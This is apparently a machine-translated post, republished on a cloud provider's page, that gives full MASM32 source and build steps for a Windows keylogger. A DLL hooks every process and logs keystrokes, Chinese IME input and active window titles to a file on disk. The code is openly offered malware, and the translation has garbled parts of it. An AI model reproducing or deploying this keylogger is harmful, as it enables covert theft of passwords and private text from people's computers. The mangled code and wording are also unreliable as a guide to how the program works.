Hook wh_callwndproc (wm_ime_composition), wh_getmessage (wm_char and wm_keyup). The former records Chinese characters, and the latter records special buttons and letter symbols.
The Chinese language passed the test in the excellent five pen and smart ABC, and the test in the other system passed the test in 2 K, XP, 2003.
3389 in 2kserver. (records cannot be successfully recorded in cmd)
The record file is in C:/keylog2.txt to prevent some people from harming others. The debugging window is not removed.
Usage: After a.exe is run, key. dll enters every process and records it.
Compile parameters:
ML/C/coff A. ASM
RC hook. RC
Link/subsystem: Windows A. OBJ hook. Res
ML/C/coff key. ASM
Link/section:. BSS, S/dll/DEF: Key. DEF/subsystem: Windows/libpath: C:/masm32/bin key. OBJ
RC file
----------------- Hook. RC -----------------
// >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>
# Include <resource. h>
// >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>
# Define ico_main 1000
# Define maid main 1000
# Define idc_text 1001
// >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>
Ico_main icon "Main. ICO"
// >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>
Dlg_main dialog 208,130,234,167
Style ds_modalframe | ws_popup | ws_visible | ws_caption | ws_sysmenu
Caption "keyboard hook"
Font 9, ""
{
Edittext idc_text, 5, 5,224,158, es_multiline | es_autovscroll
| Ws_border | ws_vscroll | ws_tabstop | es_readonly
}
// >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>
------------------- End ---------------------
Include File key. inc
------------ Key. inc -------------
Uninstallhook proto
Installhook proto
------------ End -----------------
Def file key. Def
------------ Key. Def --------------
Library key. dll
Exports installhook
Uninstallhook
--------------- End ----------------
---------------------A.exe ---------------------------
. 386
. Model flat, stdcall
Option Casemap: None
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>
; Include File Definition
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>
Include ../include/user32.inc
Includelib ../lib/user32.lib
Include ../include/kernel32.inc
Includelib ../lib/kernel32.lib
Include ../include/Windows. inc
Include key. inc
Includelib key. Lib
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>
; Equ Equivalent Definition
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>
Ico_main equ 1000
Dlg_main equ 1000
Idc_text equ 1001
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>
; Data Segment
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>
. Data?
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>
; Code segment
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>
. Code
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>
_ Procdlgmain proc uses ebx edi esi hwnd, wmsg, wparam, lparam
MoV eax, wmsg
; **************************************** ****************************
. If eax = wm_close
Invoke uninstallhook
Invoke enddialog, hwnd, null
; **************************************** ****************************
. Elseif eax = wm_initdialog
Invoke installhook
; **************************************** ****************************
. Else
MoV eax, false
RET
. Endif
MoV eax, true
RET
_ Procdlgmain endp
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>
Start:
Invoke getmodulehandle, null
Invoke dialogboxparam, eax, dlg_main, null, offset _ procdlgmain, null
Invoke exitprocess, null
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>
End start
--------------------- End -----------------------------
--------------------- Key. dll --------------------------
. 386
. Model flat, stdcall
Option Casemap: None
Include/masm32/include/Windows. inc
Include/masm32/include/user32.inc
Include/masm32/include/kernel32.inc
Includelib/masm32/lib/user32.lib
Includelib/masm32/lib/kernel32.lib
Includelib ../lib/imm32.lib
Include ../include/imm32.inc
Idc_text equ 1001
. Data
Hinstance dd 0
Maintitle dB 'keyboard hook ', 0
Logkeyfile2 dB 'C:/keylog2.txt ', 0
Keylogformat dB 0dh, 0ah, '-- = % s = --', 0dh, 0ah, 0
; ------ VK -------------
Insert dB '[insert]', 0
Delete db' [del] ', 0
Home dB '[home]', 0
Kend dB '[end]', 0
Pgdown db' [pgdn] ', 0
Pgup dB '[pgup]', 0
Down db' [distinct] ', 0
Up db' [distinct] ', 0
Left dB '[ignore]', 0
Right db' [→] ', 0
Back db' [<=] ', 0
CTRL dB '[CTRL]', 0
Tab dB '[Tab]', 0
Alt dB '[alt]', 0; the keyboard code is vk_menu
Shift db' [shift] ', 0
Kesc dB '[ESC]', 0
Space dB '', 0
Printscreen dB '[prtsc]', 0
Capslock db' [Caps Lock] ', 0
Kreturn dB 0dh, 0ah, 0
. Data?
Forcushwnd dd?
Fhwnd dd?
Hhook dd?
Hhook2 dd?
Cchar dB 20 DUP (?)
Cchar2 dB 20 DUP (?)
Keylogbuffer dB 1024 DUP (?) ; Defines the buffer of 1 kb key records
Hlogkeyfile dd?
Hactivewindow dd?
Svtitle dB 256 DUP (?) ; Current window title
Szkeylogtitlebuffer dB 270 DUP (?)
. Code
Dllentry proc hinstdll: hinstance, reason: DWORD, reserved1: DWORD
. If reason = dll_process_attach; when the DLL is loaded
Push hinstdll
Pop hinstance
. Endif
MoV eax, true
RET
Dllentry endp
_ Keylog proc keyaddr: DWORD
Invoke findwindow, null, offset maintitle
Invoke senddlgitemmessage, eax, idc_text, em_replacesel, 0, keyaddr
Invoke getactivewindow
. If eax! = Hactivewindow
MoV hactivewindow, eax
Invoke getwindowtext, hactivewindow, offset svtitle, 256
Invoke wsprintf, offset szkeylogtitlebuffer, offset keylogformat, offset svtitle
Invoke lstrcat, offset keylogbuffer, offset szkeylogtitlebuffer
. Endif
Invoke lstrlen, offset keylogbuffer
. If eax <10
Invoke lstrcat, offset keylogbuffer, keyaddr
. Else
Invoke createfile, offset logkeyfile2, generic_write, file_1__read ,/
Null, open_always, file_attribute_system, null
MoV hlogkeyfile, eax
Invoke setfilepointer, hlogkeyfile, 0, null, file_end
Invoke setendoffile, hlogkeyfile; put the file pointer at the end of the file
Invoke lstrlen, offset keylogbuffer
Invoke _ lwrite, hlogkeyfile, offset keylogbuffer, eax
Invoke closehandle, hlogkeyfile
Invoke rtlzeromemory, offset keylogbuffer, 1024
Invoke lstrcat, offset keylogbuffer, keyaddr
. Endif
RET
_ Keylog endp
Hookproc proc _ dwcode, _ wparam, _ lparam
Invoke callnexthookex, hhook, _ dwcode, _ wparam, _ lparam
Pushad
. If _ dwcode = hc_action
MoV EBX, _ lparam
Assume EBX: PTR cwpstruct
;. If [EBX]. Message = wm_ime_char
; MoV dx, word PTR [EBX]. wparam
; Xchg DL, DH
; MoV EBX, offset cchar
; MoV word PTR [EBX], DX
; Invoke messageboxa, 0, ADDR cchar, ADDR cchar, 1
; Invoke _ keylog, ADDR cchar
. If [EBX]. Message = wm_ime_composition
Invoke getfocus
MoV forcushwnd, eax
Invoke immgetcontext, forcushwnd
MoV fhwnd, eax
Invoke immgetcompositionstring, fhwnd, gcs_resultstr, null, 0
Add eax, sizeof wchar
Invoke immgetcompositionstring, fhwnd, gcs_resultstr, offset cchar, eax
; Invoke messageboxa, 0, offset cchar, offset cchar, 1
Invoke lstrcmp, ADDR cchar, ADDR cchar2
. If eax
Invoke _ keylog, ADDR cchar
. Endif
Invoke lstrcpy, ADDR cchar2, ADDR cchar
Invoke rtlzeromemory, offset cchar, 20
Invoke immreleasecontext, forcushwnd, fhwnd
. Endif
Assume EBX: Nothing
. Endif
Popad
XOR eax, eax
RET
Hookproc endp
Hookproc2 proc _ dwcode, _ wparam, _ lparam
Invoke callnexthookex, hhook, _ dwcode, _ wparam, _ lparam
Pushad
. If _ dwcode = hc_action
MoV EBX, _ lparam
Assume EBX: PTR msg
. If [EBX]. Message = wm_keyup
MoV edX, [EBX]. wparam
. If DL <30 h
. If DL = vk_space
; Invoke _ keylog, ADDR Space
JMP @ ex
. Elseif DL = vk_return
; Invoke _ keylog, ADDR kreturn
JMP @ ex
. Elseif DL = vk_pgdn; down
Invoke _ keylog, ADDR pgdown
JMP @ ex
. Elseif DL = vk_pgup; up
Invoke _ keylog, ADDR pgup
JMP @ ex
. Elseif DL = vk_capital
Invoke _ keylog, ADDR capslock
JMP @ ex
. Elseif DL = vk_home
Invoke _ keylog, ADDR home
JMP @ ex
. Elseif DL = vk_end
Invoke _ keylog, ADDR kend
JMP @ ex
. Elseif DL = vk_delete
Invoke _ keylog, ADDR Delete
JMP @ ex
. Elseif DL = vk_insert
Invoke _ keylog, ADDR insert
JMP @ ex
. Elseif DL = vk_down
Invoke _ keylog, ADDR down
JMP @ ex
. Elseif DL = vk_up
Invoke _ keylog, ADDR up
JMP @ ex
. Elseif DL = vk_left
Invoke _ keylog, ADDR left
JMP @ ex
. Elseif DL = vk_right
Invoke _ keylog, ADDR right
JMP @ ex
. Elseif DL = vk_control
; Invoke _ keylog, ADDR CTRL
JMP @ ex
. Elseif DL = vk_tab
Invoke _ keylog, ADDR Tab
JMP @ ex
. Elseif DL = vk_escape
Invoke _ keylog, ADDR kesc
JMP @ ex
. Elseif DL = vk_snapshot
Invoke _ keylog, ADDR printscreen
JMP @ ex
. Elseif DL = vk_menu
Invoke _ keylog, ADDR alt
JMP @ ex
. Endif
. Endif
. Elseif [EBX]. Message = wm_char
Invoke isdbcsleadbyte, [EBX]. wparam
. If! Eax
. If _ wparam & pm_remove
MoV dx, word PTR [EBX]. wparam
. If DL = vk_back
Invoke _ keylog, ADDR back
. Elseif DL = vk_return
Invoke _ keylog, ADDR kreturn
. Elseif DL = vk_space
Invoke _ keylog, ADDR Space
. Else
MoV EBX, offset cchar
MoV word PTR [EBX], DX
; Invoke messageboxa, 0, ADDR cchar, ADDR cchar, 1
Invoke _ keylog, ADDR cchar
. Endif
. Endif
. Endif
. Endif
@ Ex:
Assume EBX: Nothing
. Endif
Popad
XOR eax, eax
RET
Hookproc2 endp
Installhook proc
Invoke setwindowshookex, wh_callwndproc, ADDR hookproc, hinstance, null
MoV hhook2, eax
Invoke setwindowshookex, wh_getmessage, ADDR hookproc2, hinstance, null
MoV hhook, eax
RET
Installhook endp
Uninstallhook proc
Invoke unhookwindowshookex, hhook
Invoke unhookwindowshookex, hhook2
RET
Uninstallhook endp
End dllentry
----------------------------------------------- End ---------------------------
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
